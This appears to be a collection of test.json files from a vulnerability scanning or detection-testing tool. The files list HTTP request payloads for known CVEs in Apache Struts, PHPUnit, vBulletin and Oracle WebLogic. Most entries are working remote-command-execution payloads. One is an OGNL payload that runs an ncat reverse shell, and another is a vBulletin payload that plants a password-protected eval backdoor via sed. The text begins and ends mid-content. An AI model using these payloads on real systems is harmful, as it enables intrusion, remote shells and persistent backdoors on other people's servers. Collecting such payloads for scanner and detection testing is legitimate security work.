chr%2891%29+.+chr%2834%29+.+chr%2847%29+.+chr%2898%29+.+chr%28105%29+.+chr%28110%29+.+chr%2847%29+.+chr%28115%29+.+chr%28104%29+.+chr%2834%29+.+chr%2844%29+.+chr%2834%29+.+chr%2845%29+.+chr%28105%29+.+chr%2834%29+.+chr%2893%29+.+chr%2841%29+.+chr%2859%29+.+chr%2839%29%29%27%7D%29%25%5D
--------------------------------------------------------------------------------
/tests/CVE-2017-9791/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/struts2-showcase/integration/saveGangster.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "name": "%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27\"+cmd+\"%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D",
11 | "age": "123",
12 | "__checkbox_bustedBefore": "true",
13 | "description": "123"
14 | }
15 | },
16 | {
17 | "Method": "POST",
18 | "URI": "/struts2-showcase/integration/saveGangster.action",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0",
21 | "Content-Type": "application/x-www-form-urlencoded"
22 | },
23 | "Data": {
24 | "name": "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ncat -e /bin/bash 127.0.0.1 4444').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
25 | }
26 | },
27 | {
28 | "Method": "POST",
29 | "URI": "/2.3.15.1-showcase/integration/saveGangster.action",
30 | "Headers": {
31 | "User-Agent": "Mozilla/5.0",
32 | "Content-Type": "application/x-www-form-urlencoded",
33 | "Referer": "/2.3.15.1-showcase/integration/editGangster"
34 | },
35 | "Data": {
36 | "name": "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('dir'))}"
37 | }
38 | },
39 | {
40 | "Method": "POST",
41 | "URI": "/struts2-showcase/integration/saveGangster.action",
42 | "Headers": {
43 | "User-Agent": "Mozilla/5.0",
44 | "Content-Type": "application/x-www-form-urlencoded",
45 | "Referer": "/2.3.15.1-showcase/integration/editGangster"
46 | },
47 | "Data": {
48 | "name": "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('dir'))}",
49 | "age": 1,
50 | "__checkbox_bustedBefore": "true",
51 | "description": "1"
52 | }
53 | }
54 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-11776/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/struts3-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/jas502n%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/struts2-showcase/${(111+111)}/actionChain1.action",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/struts2-showcase/$%7b(111+111)%7d/actionChain1.action",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0"
21 | }
22 | },{
23 | "Method": "GET",
24 | "URI": "/%24%7B%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29%7D/index.action",
25 | "Headers": {
26 | "User-Agent": "Mozilla/5.0"
27 | },
28 | "Reference": "https://github.com/Ivan1ee/struts2-057-exp"
29 | },
30 | {
31 | "Method": "GET",
32 | "URI": "/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/",
33 | "Headers": {
34 | "User-Agent": "Mozilla/5.0"
35 | },
36 | "Reference": "https://github.com/Ivan1ee/struts2-057-exp"
37 | },
38 | {
39 | "Method": "GET",
40 | "URI": "/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action",
41 | "Headers": {
42 | "User-Agent": "Mozilla/5.0"
43 | },
44 | "Reference": "https://github.com/Ivan1ee/struts2-057-exp"
45 | },
46 | {
47 | "Method": "GET",
48 | "URI": "/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D",
49 | "Headers": {
50 | "User-Agent": "Mozilla/5.0"
51 | },
52 | "Reference": "https://github.com/Lucifer1993/struts-scan/blob/master/struts-scan.py"
53 | },
54 | {
55 | "Method": "GET",
56 | "URI": "/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D",
57 | "Headers": {
58 | "User-Agent": "Mozilla/5.0"
59 | },
60 | "Reference": "https://github.com/Lucifer1993/struts-scan/blob/master/struts-scan.py"
61 | }
62 | ]
63 |
--------------------------------------------------------------------------------
/tests/CVE-2017-9841/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Data-File": "test1.txt",
10 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
11 | },
12 | {
13 | "Method": "POST",
14 | "URI": "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php",
15 | "Headers": {
16 | "User-Agent": "Mozilla/5.0",
17 | "Connection": "close"
18 | },
19 | "Data-File": "test1.txt",
20 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
21 | },
22 | {
23 | "Method": "POST",
24 | "URI": "/vendor/phpunit/src/Util/PHP/eval-stdin.php",
25 | "Headers": {
26 | "User-Agent": "Mozilla/5.0",
27 | "Connection": "close"
28 | },
29 | "Data-File": "test1.txt",
30 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
31 | },
32 | {
33 | "Method": "POST",
34 | "URI": "/vendor/phpunit/Util/PHP/eval-stdin.php",
35 | "Headers": {
36 | "User-Agent": "Mozilla/5.0",
37 | "Connection": "close"
38 | },
39 | "Data-File": "test1.txt",
40 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
41 | },
42 | {
43 | "Method": "POST",
44 | "URI": "/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
45 | "Headers": {
46 | "User-Agent": "Mozilla/5.0",
47 | "Connection": "close"
48 | },
49 | "Data-File": "test1.txt",
50 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
51 | },
52 | {
53 | "Method": "POST",
54 | "URI": "/phpunit/phpunit/Util/PHP/eval-stdin.php",
55 | "Headers": {
56 | "User-Agent": "Mozilla/5.0",
57 | "Connection": "close"
58 | },
59 | "Data-File": "test1.txt",
60 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
61 | },
62 | {
63 | "Method": "POST",
64 | "URI": "/phpunit/src/Util/PHP/eval-stdin.php",
65 | "Headers": {
66 | "User-Agent": "Mozilla/5.0",
67 | "Connection": "close"
68 | },
69 | "Data-File": "test1.txt",
70 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
71 | },
72 | {
73 | "Method": "POST",
74 | "URI": "/phpunit/Util/PHP/eval-stdin.php",
75 | "Headers": {
76 | "User-Agent": "Mozilla/5.0",
77 | "Connection": "close"
78 | },
79 | "Data-File": "test1.txt",
80 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
81 | },
82 | {
83 | "Method": "POST",
84 | "URI": "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
85 | "Headers": {
86 | "User-Agent": "Mozilla/5.0",
87 | "Connection": "close"
88 | },
89 | "Data-File": "test1.txt",
90 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
91 | },
92 | {
93 | "Method": "POST",
94 | "URI": "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php",
95 | "Headers": {
96 | "User-Agent": "Mozilla/5.0",
97 | "Connection": "close"
98 | },
99 | "Data-File": "test1.txt",
100 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
101 | },
102 | {
103 | "Method": "POST",
104 | "URI": "/lib/phpunit/src/Util/PHP/eval-stdin.php",
105 | "Headers": {
106 | "User-Agent": "Mozilla/5.0",
107 | "Connection": "close"
108 | },
109 | "Data-File": "test1.txt",
110 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
111 | },
112 | {
113 | "Method": "POST",
114 | "URI": "/lib/phpunit/Util/PHP/eval-stdin.php",
115 | "Headers": {
116 | "User-Agent": "Mozilla/5.0",
117 | "Connection": "close"
118 | },
119 | "Data-File": "test1.txt",
120 | "Reference": "https://github.com/b3rksecurity/CVE-2017-9841"
121 | },
122 | {
123 | "Method": "POST",
124 | "URI": "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
125 | "Headers": {
126 | "User-Agent": "Mozilla/5.0",
127 | "accept-encoding": "gzip, deflate, br",
128 | "Accept": "*/*",
129 | "Connection": "close",
130 | "referer": "https://www.google.com/",
131 | "accept-language": "en-US,en;q=0.9",
132 | "Content-Length": "44"
133 | },
134 | "Data-File": "test2.txt",
135 | "Reference": "https://honeydb.io"
136 | }
137 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-16759/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/index.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Data": {
10 | "routestring": "ajax/render/widget_php",
11 | "widgetConfig[code]": "echo shell_exec('\"+cmd+\"'); exit;"
12 | },
13 | "Reference": "https://seclists.org/fulldisclosure/2019/Sep/31"
14 | },
15 | {
16 | "Method": "POST",
17 | "URI": "/index.php?routestring=ajax/render/widget_php",
18 | "Headers": {
19 | "User-Agent": "Mozilla/5.0",
20 | "Connection": "close"
21 | },
22 | "Data": {
23 | "widgetConfig[code]": "echo shell_exec('\"+cmd+\"'); exit;"
24 | },
25 | "Reference": "https://seclists.org/fulldisclosure/2019/Sep/31"
26 | },
27 | {
28 | "Method": "POST",
29 | "URI": "/index.php",
30 | "Headers": {
31 | "User-Agent": "Mozilla/5.0",
32 | "Connection": "close",
33 | "Content-Length": "378",
34 | "Content-Type": "application/x-www-form-urlencoded",
35 | "Accept-Encoding": "gzip"
36 | },
37 | "Data": {
38 | "routestring": "ajax/render/widget_php",
39 | "widgetConfig%5Bcode%5D": "echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B"
40 | },
41 | "Reference": "honeydb.io"
42 | },
43 | {
44 | "Method": "POST",
45 | "URI": "/index.php?routestring=ajax/render/widget_php",
46 | "Headers": {
47 | "User-Agent": "Mozilla/5.0",
48 | "Connection": "close",
49 | "Content-Length": "378",
50 | "Content-Type": "application/x-www-form-urlencoded",
51 | "Accept-Encoding": "gzip"
52 | },
53 | "Data": {
54 | "widgetConfig%5Bcode%5D": "echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B"
55 | },
56 | "Reference": "honeydb.io"
57 | },
58 | {
59 | "Method": "POST",
60 | "URI": "/index.php?routestring=ajax/render/widget_php",
61 | "Headers": {
62 | "User-Agent": "Mozilla/5.0",
63 | "Connection": "close",
64 | "Content-Length": "378",
65 | "Content-Type": "application/x-www-form-urlencoded",
66 | "Accept-Encoding": "gzip"
67 | },
68 | "Data": {
69 | "widgetConfig[code]": "echo shell_exec('sed -i \\'s/eval(\\$code);/if (isset(\\$_REQUEST[\"epass\"]) \\&\\& \\$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\\$code); }/g\\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"
70 | },
71 | "Reference": "honeydb.io"
72 | },
73 | {
74 | "Method": "POST",
75 | "URI": "/forum.php?routestring=ajax/render/widget_php",
76 | "Headers": {
77 | "User-Agent": "Mozilla/5.0",
78 | "Connection": "close",
79 | "Content-Length": "69",
80 | "Content-Type": "application/x-www-form-urlencoded",
81 | "Accept-Encoding": "gzip"
82 | },
83 | "Data": {
84 | "epass": "2dmfrb28nu3c6s9j",
85 | "widgetConfig[code]": "=die(@md5(HellovBulletin));"
86 | },
87 | "Reference": "honeydb.io"
88 | },
89 | {
90 | "Method": "POST",
91 | "URI": "/forum.php?routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo();",
92 | "Headers": {
93 | "User-Agent": "Mozilla/5.0",
94 | "Connection": "close",
95 | "Content-Type": "application/x-www-form-urlencoded",
96 | "Accept-Encoding": "gzip"
97 | },
98 | "Reference": "https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/"
99 | },
100 | {
101 | "Method": "GET",
102 | "URI": "/forum.php?routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo();",
103 | "Headers": {
104 | "User-Agent": "Mozilla/5.0",
105 | "Connection": "close"
106 | },
107 | "Reference": "https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/"
108 | }
109 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-12611/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/?id=%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/?name=%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/?filename=%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0"
21 | }
22 | },
23 | {
24 | "Method": "GET",
25 | "URI": "/?username=%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0"
28 | }
29 | },
30 | {
31 | "Method": "GET",
32 | "URI": "/?password=%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D",
33 | "Headers": {
34 | "User-Agent": "Mozilla/5.0"
35 | }
36 | }
37 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-10271/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/wls-wsat/CoordinatorPortType",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Length": "1226",
8 | "Content-Type": "text/xml",
9 | "Accept-Encoding": "gzip, deflate, compress",
10 | "Accept": "*/*"
11 | },
12 | "Data-File": "test1.txt",
13 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
14 | },
15 | {
16 | "Method": "POST",
17 | "URI": "/wls-wsat/RegistrationPortTypeRPC",
18 | "Headers": {
19 | "User-Agent": "Mozilla/5.0",
20 | "Content-Length": "1226",
21 | "Content-Type": "text/xml",
22 | "Accept-Encoding": "gzip, deflate, compress",
23 | "Accept": "*/*"
24 | },
25 | "Data-File": "test1.txt",
26 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
27 | },
28 | {
29 | "Method": "POST",
30 | "URI": "/wls-wsat/ParticipantPortType",
31 | "Headers": {
32 | "User-Agent": "Mozilla/5.0",
33 | "Content-Length": "1226",
34 | "Content-Type": "text/xml",
35 | "Accept-Encoding": "gzip, deflate, compress",
36 | "Accept": "*/*"
37 | },
38 | "Data-File": "test1.txt",
39 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
40 | },
41 | {
42 | "Method": "POST",
43 | "URI": "/wls-wsat/RegistrationRequesterPortType",
44 | "Headers": {
45 | "User-Agent": "Mozilla/5.0",
46 | "Content-Length": "1226",
47 | "Content-Type": "text/xml",
48 | "Accept-Encoding": "gzip, deflate, compress",
49 | "Accept": "*/*"
50 | },
51 | "Data-File": "test1.txt",
52 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
53 | },
54 | {
55 | "Method": "POST",
56 | "URI": "/wls-wsat/CoordinatorPortType11",
57 | "Headers": {
58 | "User-Agent": "Mozilla/5.0",
59 | "Content-Length": "1226",
60 | "Content-Type": "text/xml",
61 | "Accept-Encoding": "gzip, deflate, compress",
62 | "Accept": "*/*"
63 | },
64 | "Data-File": "test1.txt",
65 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
66 | },
67 | {
68 | "Method": "POST",
69 | "URI": "/wls-wsat/RegistrationPortTypeRPC11",
70 | "Headers": {
71 | "User-Agent": "Mozilla/5.0",
72 | "Content-Length": "1226",
73 | "Content-Type": "text/xml",
74 | "Accept-Encoding": "gzip, deflate, compress",
75 | "Accept": "*/*"
76 | },
77 | "Data-File": "test1.txt",
78 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
79 | },
80 | {
81 | "Method": "POST",
82 | "URI": "/wls-wsat/ParticipantPortType11",
83 | "Headers": {
84 | "User-Agent": "Mozilla/5.0",
85 | "Content-Length": "1226",
86 | "Content-Type": "text/xml",
87 | "Accept-Encoding": "gzip, deflate, compress",
88 | "Accept": "*/*"
89 | },
90 | "Data-File": "test1.txt",
91 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
92 | },
93 | {
94 | "Method": "POST",
95 | "URI": "/wls-wsat/RegistrationRequesterPortType11",
96 | "Headers": {
97 | "User-Agent": "Mozilla/5.0",
98 | "Content-Length": "1226",
99 | "Content-Type": "text/xml",
100 | "Accept-Encoding": "gzip, deflate, compress",
101 | "Accept": "*/*"
102 | },
103 | "Data-File": "test1.txt",
104 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
105 | },
106 | {
107 | "Method": "POST",
108 | "URI": "/wls-wsat/CoordinatorPortType",
109 | "Headers": {
110 | "User-Agent": "Mozilla/5.0",
111 | "Content-Length": "1226",
112 | "Content-Type": "text/xml",
